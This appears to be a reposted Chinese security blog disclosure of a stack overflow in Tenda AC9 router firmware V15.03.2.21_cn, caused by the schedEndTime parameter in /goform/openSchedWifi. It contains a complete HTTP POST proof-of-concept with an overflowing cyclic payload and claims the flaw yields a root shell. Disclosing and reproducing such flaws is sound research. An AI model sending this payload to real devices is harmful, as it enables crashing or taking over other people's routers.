腾达AC9 V15.03.2.21_cn栈溢出

admin

102776
文章

87
评论

2022年3月9日11:51:09评论125 views字数 2487阅读8分17秒阅读模式

点击上方蓝字“Ots安全”一起玩耍

概述

厂家网站信息：https://www.tenda.com.cn/profile/contact.html
固件下载地址：https ://www.tenda.com.cn/download/default.html

1. 受影响的版本

腾达AC9 V15.03.2.21_cn栈溢出

图1为路由器最新固件Ba

漏洞详情

函数开始时将schedendtime参数对应的内容传递给V20，然后V20直接复制到PTR+10的栈中。没有大小检查，所以存在栈溢出漏洞

腾达AC9 V15.03.2.21_cn栈溢出

反复出现的漏洞和 POC

为了重现漏洞，可以遵循以下步骤：

使用胖子模拟固件V15.03.2.21_cn
使用以下 POC 攻击进行攻击

POST /goform/openSchedWifi HTTP/1.1Host: 192.168.11.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 1602Origin: http://192.168.11.1Connection: closeReferer: http://192.168.11.1/wifi_time.html?random=0.20002645587866297&Cookie: password=7c90ed4e4d4bf1e300aa08103057ccbcnbf1qw
schedWifiEnable=1&schedStartTime=00%3A00&schedEndTime=01aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaaeaaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae%3A00&timeType=1&day=1%2C1%2C1%2C1%2C1%2C0%2C0

复现结果如下：

腾达AC9 V15.03.2.21_cn栈溢出

图2 POC攻击效果

最后可以写exp，可以达到很稳定的获取root shell的效果

腾达AC9 V15.03.2.21_cn栈溢出

原文始发于微信公众号（Ots安全）：腾达AC9 V15.03.2.21_cn栈溢出

左青龙
微信扫一扫

右白虎
微信扫一扫

腾达AC9 V15.03.2.21_cn栈溢出

CVE-2024-28253 :OpenMetadata

CVE-2024-27956 WordPress Automatic SQL注入漏洞可添加后台账号

用友NC down/bill存在SQL注入漏洞(XVE-2024-9469)

CVE-2024-23722

CVE-2024-0783

CNVD-2024-06148

CVE-2024-4040｜CrushFTP 认证绕过模板注入漏洞（POC）

【漏洞复现】ZenTao（禅道）身份认证绕过漏洞（QVD-2024-15263）

（CVE-2024-25648）福昕阅读器 ComboBox 小部件格式事件 UAF

漏洞复现 || SpringBlade dict-biz/list接口SQL注入

发表评论

在线咨询

微信